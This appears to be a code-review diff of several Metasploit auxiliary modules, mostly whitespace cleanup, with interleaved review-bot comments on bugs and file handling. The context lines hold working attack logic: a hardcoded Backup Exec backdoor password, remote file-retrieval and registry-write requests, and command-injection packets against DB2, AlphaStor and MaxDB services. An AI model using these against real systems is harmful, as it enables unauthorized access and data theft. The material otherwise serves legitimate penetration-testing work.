diff --git a/modules/auxiliary/admin/backupexec/dump.rb b/modules/auxiliary/admin/backupexec/dump.rb index e6f4c1dc9e..f62ef54489 100644 --- a/modules/auxiliary/admin/backupexec/dump.rb +++ b/modules/auxiliary/admin/backupexec/dump.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,13 +18,13 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::NDMP def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Veritas Backup Exec Windows Remote File Access', 'Description' => %q{ This module abuses a logic flaw in the Backup Exec Windows Agent to download arbitrary files from the system. This flaw was found by someone who wishes to - remain anonymous and affects all known versions of the Backup Exec Windows Agent. The - output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program + remain anonymous and affects all known versions of the Backup Exec Windows Agent. The + output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program listed in the references section. To transfer an entire directory, specify a path that includes a trailing backslash. }, @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary 'Version' => '$Revision$', 'References' => [ - ['OSVDB', '18695'], + ['OSVDB', '18695'], ['BID', '14551'], ['URL', 'http://www.fpns.net/willy/msbksrc.lzh'], ], 
@@ -43,44 +43,44 @@ class Metasploit3 < Msf::Auxiliary ], 'DefaultAction' => 'Download' )) - + register_options( [ Opt::RPORT(10000), - OptAddress.new('LHOST', + OptAddress.new('LHOST', [ false, "The local IP address to accept the data connection" ] ), - OptPort.new('LPORT', + OptPort.new('LPORT', [ false, "The local port to accept the data connection" ] - ), - OptString.new('RPATH', - [ + ), + OptString.new('RPATH', + [ true, - "The remote filesystem path to download", + "The remote filesystem path to download", "C:\\boot.ini" ] ), - OptString.new('LPATH', - [ + OptString.new('LPATH', + [ true, - "The local filename to store the exported data", + "The local filename to store the exported data", "backupexec_dump.mtf" ] - ), + ), ], self.class) end def run print_status("Attempting to retrieve #{datastore['RPATH']}...") - + lfd = File.open(datastore['LPATH'], 'w') - + connect data = ndmp_recv() if (not data) @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary username = "root" password = "\xb4\xb8\x0f\x26\x20\x5c\x42\x34\x03\xfc\xae\xee\x8f\x91\x3d\x6f" - + # # Authenticate using the backdoor password # @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary username, password ].pack('NNNNNNNNA*A*') - + print_status("Sending magic authentication request...") ndmp_send(auth) data = ndmp_recv() @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Auxiliary print_error("Did not receive a response to our authentication request") disconnect return - end + end # @@ -125,10 +125,10 @@ class Metasploit3 < Msf::Auxiliary sfd = Rex::Socket.create_tcp_server( 'LocalPort' => datastore['LPORT'] ) - + local_addr = (datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])) local_port = sfd.getsockname[2] - + # # Create the DATA_CONNECT request # @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary Rex::Socket.gethostbyname(local_addr)[3], local_port ].pack('NNNNNNNA4N') - + print_status("Sending data connection request...") ndmp_send(conn) data = ndmp_recv() 
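Review bot: `lfd = File.open(datastore['LPATH'], 'w')` near the end of this hunk truncates the output file before `connect` has even been attempted, and none of the `disconnect; return` failure exits that follow in `run` (the `@@ -115`, `@@ -152`, `@@ -182` and `@@ -256` hunks) close it, so every protocol failure leaks the handle and leaves an empty LPATH on disk; `lfd.close` is only reached on the success path in the last hunk of the file. Opening the file immediately before the transfer loop and closing both `lfd` and `rfd` in an `ensure` avoids both problems: wrap the loop in `File.open(datastore['LPATH'], 'w') do |lfd|` … `end` and move `rfd.close` into an `ensure` on the surrounding `begin`. `run` continues past the end of this hunk.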
@@ -152,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary
 sfd.close
 disconnect
 return
-end
+end
 
 #
 # Wait for the agent to connect back
@@ -160,8 +160,8 @@ class Metasploit3 < Msf::Auxiliary
 print_status("Waiting for the data connection...")
 rfd = sfd.accept()
 sfd.close
-
-
+
+
 #
 # Create the Mover Set Record Size request
 #
@@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary
 0,
 0x8000
 ].pack('NNNNNNN')
-
+
 print_status("Sending transfer parameters...")
 ndmp_send(msrs)
 data = ndmp_recv()
@@ -182,18 +182,18 @@ class Metasploit3 < Msf::Auxiliary
 print_error("Did not receive a response to our parameters request")
 disconnect
 return
-end
-
+end
+
 #
 # Define our tranfer parameters
 #
-xenv =
+xenv =
 [
 ['USERNAME', ''],
 ['BU_EXCLUDE_ACTIVE_FILES', '0'],
 ['FILESYSTEM', "\"\\\\#{datastore['RHOST']}\\#{datastore['RPATH']}\",v0,t0,l0,n0,f0"]
 ]
-
+
 #
 # Create the DATA_START_BACKUP request
 #
@@ -208,26 +208,26 @@ class Metasploit3 < Msf::Auxiliary
 ].pack('NNNNNNN')
 bkup += "dump"
 bkup += [ xenv.length ].pack('N')
-
+
 #
 # Encode the transfer parameters
 #
 xenv.each do |e|
 k,v = e
-
+
 # Variable
 bkup += [k.length].pack('N')
 bkup += k
 bkup += Rex::Encoder::NDR.align(k)
-
+
 # Value
 bkup += [v.length].pack('N')
 bkup += v
-bkup += Rex::Encoder::NDR.align(v)
+bkup += Rex::Encoder::NDR.align(v)
 end
-
+
 bkup[-1, 1] = "\x01"
-
+
 print_status("Sending backup request...")
 ndmp_send(bkup)
 data = ndmp_recv()
@@ -236,7 +236,7 @@ class Metasploit3 < Msf::Auxiliary
 disconnect
 return
 end
-
+
 #
 # Create the GET_ENV request
 #
@@ -246,7 +246,7 @@ class Metasploit3 < Msf::Auxiliary
 0,
 0x4004,
 0,
-0
+0
 ].pack('NNNNNN')
 
 print_status("Sending environment request...")
@@ -256,14 +256,14 @@ class Metasploit3 < Msf::Auxiliary
 print_error("Did not receive a response to our environment request")
 disconnect
 return
-end
-
-#
+end
+
+#
 # Start transferring data
 #
 print_status("Transferring data...")
 bcnt = 0
-
+
 begin
 while (data = rfd.get_once)
 bcnt += data.length
@@ -271,13 +271,13 @@ class Metasploit3 < Msf::Auxiliary end rescue ::EOFError end - + lfd.close rfd.close - + print_status("Transferred #{bcnt} bytes.") disconnect - + end - + end diff --git a/modules/auxiliary/admin/backupexec/registry.rb b/modules/auxiliary/admin/backupexec/registry.rb index 00279357e3..883698ca64 100644 --- a/modules/auxiliary/admin/backupexec/registry.rb +++ b/modules/auxiliary/admin/backupexec/registry.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,14 +19,14 @@ class Metasploit3 < Msf::Auxiliary include ::Rex::Platforms::Windows def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Veritas Backup Exec Server Registry Access', 'Description' => %q{ This modules exploits a remote registry access flaw in the BackupExec Windows Server RPC service. This vulnerability was discovered by Pedram Amini and is based - on the NDR stub information information posted to openrce.org. + on the NDR stub information information posted to openrce.org. Please see the action list for the different attack modes. - + }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -42,16 +42,16 @@ class Metasploit3 < Msf::Auxiliary ['System Information'], ['Create Logon Notice'] ], - 'DefaultAction' => 'System Information' + 'DefaultAction' => 'System Information' )) - + register_options( [ Opt::RPORT(6106), - OptString.new('WARN', - [ + OptString.new('WARN', + [ false, - "The warning to display for the Logon Notice action", + "The warning to display for the Logon Notice action", "Compromised by Metasploit!\r\n" ] ), 
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary
 end
 
 def auxiliary_commands
-return {
+return {
 "regread" => "Read a registry value",
 # "regenum" => "Enumerate registry keys",
 }
@@ -73,15 +73,15 @@ class Metasploit3 < Msf::Auxiliary
 logon_notice()
 end
 end
-
-
+
+
 def cmd_regread(*args)
-
+
 if (args.length == 0)
 print_status("Usage: regread HKLM\\\\Hardware\\\\Description\\\\System\\\\SystemBIOSVersion")
 return
 end
-
+
 paths = args[0].split("\\")
 hive = paths.shift
 subval = paths.pop
@@ -97,12 +97,12 @@ class Metasploit3 < Msf::Auxiliary
 end
 
 def cmd_regenum(*args)
-
+
 if (args.length == 0)
 print_status("Usage: regenum HKLM\\\\Software")
 return
 end
-
+
 paths = args[0].split("\\")
 hive = paths.shift
 subkey = "\\" + paths.join("\\")
@@ -115,10 +115,10 @@ class Metasploit3 < Msf::Auxiliary
 end
 end
 
-
+
 def system_info
 print_status("Dumping system information...")
-
+
 prod_id = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows\\CurrentVersion', 'ProductId') || 'Unknown'
 prod_name = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'ProductName') || 'Windows (Unknown)'
 prod_sp = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'CSDVersion') || 'No Service Pack'
@@ -132,14 +132,14 @@ class Metasploit3 < Msf::Auxiliary
 print_status("The system is registered to #{deunicode(owner)} of #{deunicode(company)}")
 print_status("The system runs on a #{deunicode(cpu)}")
 end
-
+
 def logon_notice
 print_status("Setting the logon warning to #{datastore['WARN'].strip}...")
 backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeText', REG_SZ, datastore['WARN'])
 backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeCaption', REG_SZ, 'METASPLOIT')
 end
-
-
+
+
 def deunicode(str)
 str.gsub(/\x00/, '').strip
 end
@@ -149,9 +149,9 @@ class Metasploit3 < Msf::Auxiliary # def backupexec_regwrite(hive, subkey, subval, type, data) stub = backupexec_regrpc_write( - :hive => registry_hive_lookup(hive), - :subkey => subkey, - :subval => subval, + :hive => registry_hive_lookup(hive), + :subkey => subkey, + :subval => subval, :type => type, :data => data ) @@ -159,15 +159,15 @@ class Metasploit3 < Msf::Auxiliary return false if resp.length == 0 return true end - + # # Read a registry key # def backupexec_regread(hive, subkey, subval, type = REG_SZ) stub = backupexec_regrpc_read( - :hive => registry_hive_lookup(hive), - :subkey => subkey, - :subval => subval, + :hive => registry_hive_lookup(hive), + :subkey => subkey, + :subval => subval, :type => type ) resp = backupexec_regrpc_call(4, stub) @@ -184,40 +184,40 @@ class Metasploit3 < Msf::Auxiliary # def backupexec_regenum(hive, subkey) stub = backupexec_regrpc_enum( - :hive => registry_hive_lookup(hive), + :hive => registry_hive_lookup(hive), :subkey => subkey ) resp = backupexec_regrpc_call(7, stub) p resp - + return nil if resp.length == 0 ret, len = resp[0,8].unpack('VV') return nil if ret == 0 return nil if len == 0 return resp[8, len] end - + # # Call the backupexec registry service - # + # def backupexec_regrpc_call(opnum, data = '') handle = dcerpc_handle( '93841fd0-16ce-11ce-850d-02608c44967b', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']] ) - + dcerpc_bind(handle) resp = dcerpc.call(opnum, data) outp = '' - + if (dcerpc.last_response and dcerpc.last_response.stub_data) outp = dcerpc.last_response.stub_data end disconnect - + outp end @@ -261,11 +261,11 @@ class Metasploit3 < Msf::Auxiliary hive = opts[:hive] || HKEY_LOCAL_MACHINE type = opts[:type] || REG_SZ data = opts[:data] || '' - - if (type == REG_SZ || type == REG_EXPAND_SZ) + + if (type == REG_SZ || type == REG_EXPAND_SZ) data = Rex::Text.to_unicode(data+"\x00") end - + stub = NDR.UnicodeConformantVaryingString(subkey) + NDR.UnicodeConformantVaryingString(subval) + 
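Review bot: `p resp` in `backupexec_regenum` (the `@@ -184,40` hunk) is a leftover debug dump that prints the raw RPC response with `Kernel#p` straight to stdout, bypassing the module's `print_status`/`print_error` routing and appearing even in non-verbose runs; it should be deleted, or if the stub is still useful while developing, routed through the module's own print helpers. In the same hunk `backupexec_regrpc_call` binds and then calls `disconnect` on every invocation, so `system_info` opens a fresh DCERPC session for each registry read; if that is deliberate, a one-line comment above `disconnect` explaining why the session is torn down per call would stop the next reader from "optimising" it away.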
@@ -279,5 +279,5 @@ class Metasploit3 < Msf::Auxiliary
 NDR.long(hive)
 return stub
 end
-
+
 end
\ No newline at end of file
diff --git a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb
index a0ebfda909..e8699952a8 100644
--- a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb
+++ b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb
@@ -3,7 +3,7 @@
 ##
 
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::Tcp
 
 def initialize(info = {})
-super(update_info(info,
+super(update_info(info,
 'Name' => 'Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access',
 'Description' => %q{
 This module tests for a logic vulnerability in the Cisco VPN Concentrator
diff --git a/modules/auxiliary/admin/db2/db2rcmd.rb b/modules/auxiliary/admin/db2/db2rcmd.rb
index fbb62094b9..125a10163f 100644
--- a/modules/auxiliary/admin/db2/db2rcmd.rb
+++ b/modules/auxiliary/admin/db2/db2rcmd.rb
@@ -1,5 +1,9 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -12,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::SMB
 
 def initialize(info = {})
-super(update_info(info,
+super(update_info(info,
 'Name' => 'IBM DB2 db2rcmd.exe Command Execution Vulnerability.',
 'Description' => %q{
 This module exploits a vulnerability in the Remote Command Server
@@ -31,12 +35,12 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Mar 4 2004')) - register_options( + register_options( [ OptString.new('CMD', [ true, 'The command to execute', 'ver']), OptString.new('SMBUser', [ true, 'The username to authenticate as', 'db2admin']), OptString.new('SMBPass', [ true, 'The password for the specified username', 'db2admin']) - ], self.class ) + ], self.class ) end def run @@ -46,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...") - # Connect with a valid user/pass. if not, then bail. + # Connect with a valid user/pass. if not, then bail. begin smb_login() rescue ::Exception => e @@ -54,8 +58,8 @@ class Metasploit3 < Msf::Auxiliary disconnect return end - - # Have it so our command arg is convenient to call. + + # Have it so our command arg is convenient to call. rcmd = datastore['CMD'] print_status("Connecting to named pipe \\DB2REMOTECMD...") @@ -84,10 +88,10 @@ class Metasploit3 < Msf::Auxiliary # Read from the pipe and give us the data. res = pipe.read() puts res - + # Close the named pipe and disconnect from the socket. - pipe.close + pipe.close disconnect - + end end diff --git a/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb b/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb index c93bf65165..fd65a41fc4 100644 --- a/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb +++ b/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'May 27 2008')) - register_options( + register_options( [ Opt::RPORT(3000), OptString.new('CMD', [ false, 'The OS command to execute', 'hostname']), 
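Review bot: `rescue ::Exception => e` around `smb_login()` in the `@@ -46,7` hunk catches every exception class, including `Interrupt`, `SystemExit` and `NoMemoryError`, so a Ctrl-C during the login is reported as a login failure instead of stopping the module; `rescue ::StandardError => e` (or the specific SMB error class the login raises) is what the `disconnect; return` that follows is meant to handle. The `begin`/`rescue` block continues past the end of that hunk. Separately, `puts res` in the `@@ -84,10` hunk writes the pipe output directly to stdout rather than through `print_line`, so it is lost when the module runs under a console that redirects output.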
@@ -43,17 +47,17 @@ class Metasploit3 < Msf::Auxiliary data = "\x75" + datastore['CMD'] pad = "\x00" * 512 - - pkt = data + pad - - print_status("Sending command: #{datastore['CMD']}") + + pkt = data + pad + + print_status("Sending command: #{datastore['CMD']}") sock.put(pkt) # try to suck it all in. sleep(5) - + res = sock.get_once - + res.each do |info| puts "[*] #{info.gsub(/[^[:print:]]+/,"")}" # hack. end diff --git a/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb index 33e6d61cee..5cf0885826 100644 --- a/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb +++ b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'May 27 2008')) - register_options( + register_options( [ Opt::RPORT(3500), OptString.new('CMD', [ false, 'The OS command to execute', 'echo metasploit > metasploit.txt']), @@ -43,17 +47,17 @@ class Metasploit3 < Msf::Auxiliary data = "\x75" + datastore['CMD'] pad = "\x00" * 512 - - pkt = data + pad - + + pkt = data + pad + # commands are executed blindly. - print_status("Sending command: #{datastore['CMD']}") + print_status("Sending command: #{datastore['CMD']}") sock.put(pkt) sleep(1) - + sock.get_once - + print_status("Executed '#{datastore['CMD']}'...") disconnect diff --git a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb index 54d01c486d..f5071d9f5d 100644 --- a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb +++ b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb 
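Review bot: `res = sock.get_once` followed by `res.each do |info|` at the end of this hunk has no nil guard: if the service closes the connection or nothing arrives within the read timeout, `get_once` appears to return nil (confirm against Rex::IO::Stream) and the module dies with NoMethodError instead of reporting an empty reply. `res.each` on a String also relies on Ruby 1.8's line-iterating `String#each`, which 1.9 removed; `(res || '').each_line do |info|` covers both cases. The sibling alphastor_librarymanager_exec hunk discards the `sock.get_once` result entirely and is unaffected.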
@@ -3,7 +3,7 @@
 ##
 
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::HttpClient
 
 def initialize(info = {})
-super(update_info(info,
+super(update_info(info,
 'Name' => 'HP Web JetAdmin 6.5 Server Arbitrary Command Execution',
 'Description' => %q{
 This module abuses a command execution vulnerability within the
@@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
 [ 'URL', 'http://www.milw0rm.com/exploits/294' ],
 ],
 'DisclosureDate' => 'Apr 27 2004'))
-
+
 register_options(
 [
 Opt::RPORT(8000),
diff --git a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb
index c250c89bb4..feefa8f96a 100644
--- a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb
+++ b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb
@@ -3,7 +3,7 @@
 ##
 
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
diff --git a/modules/auxiliary/admin/http/typo3_sa_2009_002.rb b/modules/auxiliary/admin/http/typo3_sa_2009_002.rb
index d3c8671161..f4211a12cf 100644
--- a/modules/auxiliary/admin/http/typo3_sa_2009_002.rb
+++ b/modules/auxiliary/admin/http/typo3_sa_2009_002.rb
@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -18,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary This module exploits a file disclosure vulnerability in the jumpUrl mechanism of Typo3. This flaw can be used to read any file that the web server user account has access to. - + }, 'Author' => [ 'spinbad ' ], 'License' => MSF_LICENSE, @@ -52,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary error_uri = datastore['URI'] + "/index.php?jumpurl=" +datastore['RFILE'] +"&juSecure=1&type=0&locationData=1:" ju_hash = nil - + res = send_request_raw({ 'uri' => error_uri, 'method' => 'GET', @@ -65,24 +69,24 @@ class Metasploit3 < Msf::Auxiliary if (res and res.message == "OK") res.body =~ /jumpurl Secure: Calculated juHash, ((\w)+), did not match the submitted juHash./ - + if $1.nil? print_error("Error while getting juHash. Maybe the version is already patched...") return end - + ju_hash = $1 print_status("Getting juHash from error message: #{ju_hash}") - + else print_error("No response from the server.") return end - - + + file_uri = datastore['URI'] + "/index.php?jumpurl=" +datastore['RFILE'] +"&juSecure=1&type=0&juHash=#{ju_hash}&locationData=1:" - print_status("Trying to get #{datastore['RFILE']}.") - + print_status("Trying to get #{datastore['RFILE']}.") + file = send_request_raw({ 'uri' => file_uri, 'method' => 'GET', @@ -92,15 +96,15 @@ class Metasploit3 < Msf::Auxiliary 'Connection' => 'Close', } },25) - + if (file and file.message = "OK") if file.body == 'jumpurl Secure: "' + datastore['RFILE'] + '" was not a valid file!' print_error("File #{datastore['RFILE']} does not exist.") return end - + print_status("Writing local file #{datastore['LFILE']}.") - open(datastore['LFILE'],'w') {|f| f << file.body } + open(datastore['LFILE'],'w') {|f| f << file.body } else print_error("Error while getting file.") end diff --git a/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb b/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb index db5dd20bce..6356597d7c 100644 --- a/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb 
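Review bot: `if (file and file.message = "OK")` in the `@@ -92,15` hunk is an assignment, not a comparison: it is always truthy, overwrites the response's message, and sends every non-nil response (404s and 500s included) into the file-writing branch, so the `else` / "Error while getting file." path is unreachable; it should read `if (file and file.message == "OK")`, matching the check used for `res` in the `@@ -65,24` hunk. The same branch writes with `open(datastore['LFILE'],'w')`; `Kernel#open` treats a leading `|` in the path as a command to spawn, so `File.open(datastore['LFILE'], 'w') {|f| f << file.body }` is the right call for a pathname option. The `run` method these hunks belong to starts outside them.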
+++ b/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb @@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Jan 9 2008')) - register_options( + register_options( [ Opt::RPORT(7210), OptString.new('CMD', [ false, 'The OS command to execute', 'hostname']), @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary sock.put(pdbmsrv) sock.get_once sock.put(db_version) - + ver = sock.get_once info = ver[27,2000] @@ -69,10 +69,10 @@ class Metasploit3 < Msf::Auxiliary #Send our command. len = 39 + datastore['CMD'].length - + data = len.chr + "\x00\x00\x00\x03\x3F\x00\x00\x01\x00\x00\x00\x54\x0D\x00\x00" data << "\x00\x00\x04\x00" + len.chr + "\x00\x00\x00\x65\x78\x65\x63\x5F\x73\x64" - data << "\x62\x69\x6E\x66\x6F\x20\x26\x26" + "#{datastore['CMD']}" + data << "\x62\x69\x6E\x66\x6F\x20\x26\x26" + "#{datastore['CMD']}" sock.put(data) diff --git a/modules/auxiliary/admin/ms/ms08_059_his2006.rb b/modules/auxiliary/admin/ms/ms08_059_his2006.rb index 6fc4085088..49930b9329 100644 --- a/modules/auxiliary/admin/ms/ms08_059_his2006.rb +++ b/modules/auxiliary/admin/ms/ms08_059_his2006.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -12,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft Host Integration Server 2006 Command Execution Vulnerability.', 'Description' => %q{ This module exploits a command-injection vulnerability in Microsoft Host Integration Server 2006. 
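Review bot: `len = 39 + datastore['CMD'].length` in the `@@ -69,10` hunk is emitted twice with `len.chr` as a one-byte length field, so a CMD longer than 216 characters makes `Integer#chr` raise RangeError and the module exits with a backtrace instead of a message; a guard before `data` is built, `if len > 255 then print_error("CMD too long for the one-byte length field"); return; end`, fails cleanly. The constant 39 also deserves a comment naming the fixed header bytes it accounts for, since the hex literals on the following two lines are opaque. The enclosing `run` starts outside the hunk.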
@@ -33,12 +37,12 @@ class Metasploit3 < Msf::Auxiliary
 ],
 'DisclosureDate' => 'Oct 14 2008'))
 
-register_options(
-[
+register_options(
+[
 Opt::RPORT(0),
 OptString.new('COMMAND', [ true, 'The command to execute', 'cmd.exe']),
-OptString.new('ARGS', [ true, 'The arguments to the command', '/c echo metasploit > metasploit.txt'])
-], self.class )
+OptString.new('ARGS', [ true, 'The arguments to the command', '/c echo metasploit > metasploit.txt'])
+], self.class )
 end
 
 def run
@@ -53,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
 
 if (dport == 0)
 dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.0', 'ncacn_ip_tcp')
-dport ||= dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.1', 'ncacn_ip_tcp')
+dport ||= dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.1', 'ncacn_ip_tcp')
 
 if (not dport)
 print_status("Could not determine the RPC port used by the Service.")
@@ -72,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
 print_status("Bound to #{handle} ...")
 
 cmd = NDR.string("#{datastore['COMMAND']}") + NDR.string("#{datastore['ARGS']}")
-
+
 print_status("Sending command: #{datastore['COMMAND']} #{datastore['ARGS']}")
 
 begin
@@ -81,7 +85,7 @@ class Metasploit3 < Msf::Auxiliary
 end
 
 disconnect
-
+
 end
 end
=begin
diff --git a/modules/auxiliary/admin/mssql/mssql_enum.rb b/modules/auxiliary/admin/mssql/mssql_enum.rb
index 22bfd8d739..1a10237847 100644
--- a/modules/auxiliary/admin/mssql/mssql_enum.rb
+++ b/modules/auxiliary/admin/mssql/mssql_enum.rb
@@ -1,3 +1,6 @@
+##
+# $Id$
+##
 ##
 # This file is part of the Metasploit Framework and may be subject to
 
@@ -13,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
 
 include Msf::Exploit::Remote::MSSQL
 include Msf::Auxiliary::Report
-
+
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'Microsoft SQL Server Configuration Enumerator',
@@ -31,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
 
 def run
 print_status("Running MS SQL Server Enumeration...")
-
+
 if mssql_login_datastore
 #Get Version
 print_status("Version:")
@@ -42,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
 print "[*]\t#{row}"
 end
 vernum = sqlversion.gsub("\n"," ").scan(/SQL Server\s*(200\d)/m)
-report_note(:host => datastore['RHOST'],
+report_note(:host => datastore['RHOST'],
 :proto => 'TCP',
 :port => datastore['RPORT'],
 :type => 'MSSQL_ENUM',
@@ -72,14 +75,14 @@ class Metasploit3 < Msf::Auxiliary
 #checking for C2 Audit Mode
 if sysconfig['c2 audit mode'] == 1
 print_status("\tC2 Audit Mode is Enabled")
-report_note(:host => datastore['RHOST'],
+report_note(:host => datastore['RHOST'],
 :proto => 'TCP',
 :port => datastore['RPORT'],
 :type => 'MSSQL_ENUM',
 :data => "C2 Audit Mode is Enabled")
 else
 print_status("\tC2 Audit Mode is Not Enabled")
-report_note(:host => datastore['RHOST'],
+report_note(:host => datastore['RHOST'],
 :proto => 'TCP',
 :port => datastore['RPORT'],
 :type => 'MSSQL_ENUM',
@@ -125,14 +128,14 @@ class Metasploit3 < Msf::Auxiliary
 #check if remote access is enabled
 if sysconfig['remote access'] == 1
 print_status("\tremote access is Enabled")
-report_note(:host => datastore['RHOST'],
+report_note(:host => datastore['RHOST'],
 :proto => 'TCP',
 :port => datastore['RPORT'],
 :type => 'MSSQL_ENUM',
 :data => "remote access is Enabled")
 else
 print_status("\tremote access is Not Enabled")
-report_note(:host => datastore['RHOST'],
+report_note(:host => datastore['RHOST'],
 :proto => 'TCP',
 :port => datastore['RPORT'],
 :type => 'MSSQL_ENUM',
